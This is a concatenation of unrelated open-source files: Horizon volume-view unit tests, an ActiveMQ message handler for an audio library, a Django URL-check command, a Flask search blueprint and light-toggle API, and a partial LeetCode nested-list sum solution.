self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GB)")
@test.create_stubs({cinder: ('volume_create',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 200,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=image.id,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get image from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_type_list',
'volume_list',
'volume_snapshot_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 200,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)) \
.AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=image.id,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get image from dropdown list
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_under_image_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 1, 'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
# in django 1.6 filesizeformat replaces all spaces with
# non-breaking space characters
if django.VERSION >= (1, 6):
msg = (u"The volume size cannot be less than the "
u"image size (20.0\xa0GB)")
else:
msg = (u"The volume size cannot be less than the "
u"image size (20.0 GB)")
self.assertFormError(res, 'form', None, msg)
@test.create_stubs({cinder: ('volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_get',
'image_list_detailed'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_image_under_image_min_disk_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
image = self.images.get(name="protected_images")
image.min_disk = 30
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 5, 'image_source': image.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
api.glance.image_get(IsA(http.HttpRequest),
str(image.id)).AndReturn(image)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GB)")
@test.create_stubs({cinder: ('volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_gb_used_over_alloted_quota(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 80,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'This Volume Is Huge!',
'description': u'This is a volume that is just too big!',
'method': u'CreateForm',
'size': 5000}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
expected_error = [u'A volume of 5000GB cannot be created as you only'
' have 20GB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
@test.create_stubs({cinder: ('volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_number_over_alloted_quota(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': len(self.cinder_volumes.list())}
formData = {'name': u'Too Many...',
'description': u'We have no volumes left!',
'method': u'CreateForm',
'size': 10}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
expected_error = [u'You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',
'volume_delete',),
api.nova: ('server_list',)})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
cinder.volume_delete(IsA(http.HttpRequest), volume.id)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',
'volume_delete',),
api.nova: ('server_list',)})
def test_delete_volume_error_existing_snapshot(self):
volume = self.cinder_volumes.first()
volumes = self.cinder_volumes.list()
formData = {'action':
'volumes__delete__%s' % volume.id}
exc = self.exceptions.cinder.__class__(400,
"error: dependent snapshots")
cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
cinder.volume_delete(IsA(http.HttpRequest), volume.id).\
AndRaise(exc)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'Unable to delete volume "%s". '
u'One or more snapshots depend on it.' %
volume.name)
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments(self):
PREV = settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point']
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = True
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
        # The instance choices are expected to contain a single entry,
        # the 'Choose Instance' placeholder.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.TextInput))
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = PREV
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments_cannot_set_mount_point(self):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.HiddenInput))
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_list',)})
def test_edit_attachments_attached_volume(self):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
cinder.volume_get(IsA(http.HttpRequest), volume.id) \
.AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)) \
.AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',),
api.nova: ('server_list',)})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
api.cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
.MultipleTimes().AndReturn(limits)
self.mox.ReplayAll()
res = self.client.get(VOLUME_INDEX_URL)
self.assertTemplateUsed(res, 'project/volumes/index.html')
volumes = res.context['volumes_table'].data
self.assertItemsEqual(volumes, self.cinder_volumes.list())
create_link = tables.CreateVolume()
url = create_link.get_link_url()
classes = list(create_link.get_default_classes())\
+ list(create_link.classes)
link_name = "%s (%s)" % (unicode(create_link.verbose_name),
"Quota exceeded")
expected_string = "<a href='%s' title='%s' class='%s disabled' "\
"id='volumes__action_create' data-update-url=" \
"'/project/volumes/?action=create&table=volumes'> "\
"<span class='glyphicon glyphicon-plus'></span>%s</a>" \
% (url, link_name, " ".join(classes), link_name)
self.assertContains(res, expected_string, html=True,
msg_prefix="The create button is not disabled")
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_get',)})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res, "<h2>Volume Details: Volume name</h2>",
1, 200)
self.assertContains(res, "<dd>Volume name</dd>", 1, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.id, 1, 200)
self.assertContains(res, "<dd>Available</dd>", 1, 200)
self.assertContains(res, "<dd>40 GB</dd>", 1, 200)
self.assertContains(res,
("<a href=\"/project/instances/1/\">%s</a>"
% server.name),
1,
200)
self.assertNoMessages()
@test.create_stubs({cinder: ('volume_get',)})
def test_get_data(self):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = VOLUME_INDEX_URL + \
"?action=row_update&table=volumes&obj_id=" + volume.id
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
@test.create_stubs({cinder: ('volume_get',)})
def test_detail_view_with_exception(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndRaise(self.exceptions.cinder)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, VOLUME_INDEX_URL)
@test.create_stubs({cinder: ('volume_update',
'volume_get',)})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
cinder.volume_update(IsA(http.HttpRequest),
volume.id,
volume.name,
volume.description)
self.mox.ReplayAll()
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description}
url = reverse('horizon:project:volumes:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, VOLUME_INDEX_URL)
@test.create_stubs({cinder: ('volume_get',
'volume_extend')})
def test_extend_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': u'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 100}
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_extend(IsA(http.HttpRequest),
volume.id,
formData['new_size']).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = VOLUME_INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_get',),
quotas: ('tenant_limit_usages',)})
def test_extend_volume_with_wrong_size(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
cinder.volume_get(IsA(http.HttpRequest), volume.id).\
AndReturn(self.cinder_volumes.first())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, 'form', None,
"New size must be greater than "
"current size.")
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
@test.create_stubs({cinder: ('volume_list',
'volume_backup_supported',
'tenant_absolute_limits'),
api.nova: ('server_list',)})
def _test_encryption(self, encryption):
volumes = self.volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
cinder.volume_backup_supported(IsA(http.HttpRequest))\
.MultipleTimes('backup_supported').AndReturn(False)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn(self.volumes.list())
api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
.MultipleTimes('limits').AndReturn(limits)
self.mox.ReplayAll()
res = self.client.get(VOLUME_INDEX_URL)
rows = res.context['volumes_table'].get_rows()
if encryption:
column_value = 'Yes'
else:
column_value = 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
|
394954369/horizon
|
openstack_dashboard/dashboards/project/volumes/volumes/tests.py
|
Python
|
apache-2.0
| 49,698 | 0.001127 |
#!/usr/bin/env python
# encoding: utf-8
"""
__init__.py
The MIT License (MIT)
Copyright (c) 2013 Matt Ryan
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import os
import stomp
import json
import afutils.file_pattern as pattern
from aflib3 import AFLibraryEntry
class AFMQ:
'''Represents a basic connection to an ActiveMQ
service for AudioFile.
'''
def __init__(self, queue_name):
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.disconnect()
def put(self, msg):
self.queue_handle.send(msg, destination=self.queue_name)
class BasicHandler:
'''Represents an ActiveMQ handler that consumes information
from the queue.
'''
def __init__(self, aflib, queue_name):
self.aflib = aflib
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.set_listener(queue_name, self)
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.stop()
def on_error(self, headers, message):
print '%s: Received an error: "%s"' % (self.__class__, message)
def on_message(self, headers, message):
print '%s: Received message: "%s"' % (self.__class__, message)
class AddFileHandler(BasicHandler):
'''Adds files to the AudioFile library as the files
are posted into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/library_additions')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
self.aflib.add_mp3(args[0], args[1])
class RenameFileHandler(BasicHandler):
'''Renames files from the old path to the new specified
path as the information is put into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/file_renames')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
song = AFLibraryEntry()
song.apply_dict(args[0])
newpath = pattern.get_new_path(song, args[1])
print 'Renaming "%s" as "%s"...' % (song.path, newpath)
os.rename(song.path, newpath)
if __name__ == '__main__':
pass
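# Hypothetical usage sketch (assumes a local ActiveMQ broker reachable
# through stomp's defaults; the library object and paths are illustrative):
#
#     aflib = ...  # an AudioFile library instance
#     AddFileHandler(aflib)  # consumes /audiofile/library_additions
#     queue = AFMQ('/audiofile/library_additions')
#     queue.put(json.dumps(['/music/song.mp3', 'metadata']))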
|
mattvryan/audiofile
|
afmq/__init__.py
|
Python
|
mit
| 3,351 | 0.021486 |
import logging
from django.core.management.base import BaseCommand
from citation.ping_urls import verify_url_status
logger = logging.getLogger(__name__)
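# Invoked as a Django management command; the command name comes from this
# file's name (assumed here to be validate_urls):
#
#     python manage.py validate_urls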
class Command(BaseCommand):
help = '''Method that check if the code archived urls are active and working or not '''
def handle(self, *args, **options):
verify_url_status()
logger.debug("Validation completed")
|
dhruvilpatel/citation
|
citation/management/commands/validate_urls.py
|
Python
|
gpl-3.0
| 389 | 0.002571 |
from flask import Blueprint, flash, redirect, render_template, request, url_for
from sqlalchemy.orm.exc import NoResultFound
from ..sqltypes import HashableLocale as Locale
from ..work import Trope, Work
from .db import session
adv_search_bp = Blueprint('adv_search', __name__)
@adv_search_bp.route('/', methods=['POST'])
def result():
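    # Expected POST payload (illustrative values): three parallel lists where
    # each index describes one filter, e.g.
    #   about[]=info,  category[]=media, detail[]=movie
    #   about[]=trope, category[]=name,  detail[]=42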
about = request.form.getlist('about[]', None)
category = request.form.getlist('category[]', None)
detail = request.form.getlist('detail[]', None)
error_redirect = redirect(url_for('index'))
if about is None or category is None or detail is None:
        flash('Missing search arguments.', 'danger')
return error_redirect
if type(about) != list or type(category) != list or type(detail) != list:
        flash('Search arguments must be lists.', 'danger')
return error_redirect
if len(about) != len(category) or len(about) != len(detail):
        flash('Mismatched numbers of search arguments.', 'danger')
return error_redirect
query = zip(about, category, detail)
media_list = []
trope_filter = None
for about, category, detail in query:
if about == 'info':
if category == 'media':
media_list.append(detail)
elif about == 'trope':
try:
trope = session.query(Trope).get(detail)
except NoResultFound:
return error_redirect
if trope_filter is None:
trope_filter = Work.tropes.any(Trope.id == trope.id)
else:
trope_filter = trope_filter & \
Work.tropes.any(Trope.id == trope.id)
if not media_list and trope_filter is None:
        flash('No valid search criteria given.', 'danger')
return error_redirect
result = session.query(
Work,
Work.canonical_name(Locale.parse('en_US')).label('canonical_name')
)
if media_list:
result = result.filter(Work.media_type.in_(media_list))
if trope_filter is not None:
result = result.filter(trope_filter)
return render_template('adv_search/result.html', result=result)
|
clicheio/cliche
|
cliche/web/adv_search.py
|
Python
|
mit
| 2,111 | 0 |
#!/usr/bin/env python
from flask import (Flask, request, render_template)
from flask.ext import restful
from flask.ext.restful import reqparse
import pickle
SETTINGS_P = 'settings.p'
app = Flask(__name__)
api = restful.Api(app)
def get_settings():
settings = {'state':'off'}
try:
settings = pickle.load(open(SETTINGS_P, 'rb'))
except IOError:
pass
return settings
def set_state(state):
settings = get_settings()
settings['state'] = state
pickle.dump( settings, open(SETTINGS_P, 'wb'))
# Restful Resource for setting the light state
@api.resource('/api/state')
class SetState(restful.Resource):
def get(self):
settings = get_settings()
parser = reqparse.RequestParser()
parser.add_argument('value', type=str, location='args',
choices=['on','off'])
args = parser.parse_args()
value = args['value']
if value:
set_state(value)
settings = get_settings()
print "Setting state to {}".format(value)
return {'state':settings['state']}
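# Example requests against the resource above (assuming the default Flask
# development server on port 5000):
#
#   curl 'http://localhost:5000/api/state'           # -> {"state": "off"}
#   curl 'http://localhost:5000/api/state?value=on'  # -> {"state": "on"}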
# View to present a form to change the light state
@app.route('/', methods=['GET','POST'])
def index():
if request.method == 'POST':
set_state(request.form['state'])
settings = get_settings()
state = settings['state']
return render_template('index.html', state=state)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
ajportier/raspi-gpio-work
|
light-toggle/server.py
|
Python
|
gpl-2.0
| 1,463 | 0.005468 |
__source__ = 'https://leetcode.com/problems/nested-list-weight-sum/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/nested-list-weight-sum.py
# Time: O(n)
# Space: O(h)
#
# Description: Leetcode # 339. Nested List Weight Sum
#
# Given a nested list of integers, return the sum of all integers in the list weighted by their depth.
#
# Each element is either an integer, or a list -- whose elements may also be integers or other lists.
#
# Example 1:
# Given the list [[1,1],2,[1,1]], return 10. (four 1's at depth 2, one 2 at depth 1; 4*1*2 + 2*1 = 10)
#
# Example 2:
# Given the list [1,[4,[6]]], return 27. (one 1 at depth 1, one 4 at depth 2, and one 6 at depth 3; 1 + 4*2 + 6*3 = 27)
#
# Companies
# LinkedIn
# Related Topics
# Depth-first Search
# Similar Questions
# Nested List Weight Sum II Array Nesting
#
# """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
import unittest
# 20ms 100%
class NestedInteger(object):
def isInteger(self):
"""
@return True if this NestedInteger holds a single integer, rather than a nested list.
:rtype bool
"""
def getInteger(self):
"""
@return the single integer that this NestedInteger holds, if it holds a single integer
Return None if this NestedInteger holds a nested list
:rtype int
"""
def getList(self):
"""
@return the nested list that this NestedInteger holds, if it holds a nested list
Return None if this NestedInteger holds a single integer
:rtype List[NestedInteger]
"""
class Solution(object):
def depthSum(self, nestedList):
"""
:type nestedList: List[NestedInteger]
:rtype: int
"""
def depthSumHelper(nestedList, depth):
res = 0
for l in nestedList:
if l.isInteger():
res += l.getInteger() * depth
else:
res += depthSumHelper(l.getList(), depth + 1)
return res
return depthSumHelper(nestedList, 1)
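    # An equivalent iterative sketch (added for illustration, not part of the
    # original solution): walk (list, depth) pairs with an explicit stack
    # instead of recursion.
    def depthSumIterative(self, nestedList):
        total, stack = 0, [(nestedList, 1)]
        while stack:
            lst, depth = stack.pop()
            for item in lst:
                if item.isInteger():
                    total += item.getInteger() * depth
                else:
                    stack.append((item.getList(), depth + 1))
        return total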
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
Thought: https://leetcode.com/problems/nested-list-weight-sum/solution/
/**
* // This is the interface that allows for creating nested lists.
* // You should not implement it, or speculate about its implementation
* public interface NestedInteger {
*
* // @return true if this NestedInteger holds a single integer, rather than a nested list.
* public boolean isInteger();
*
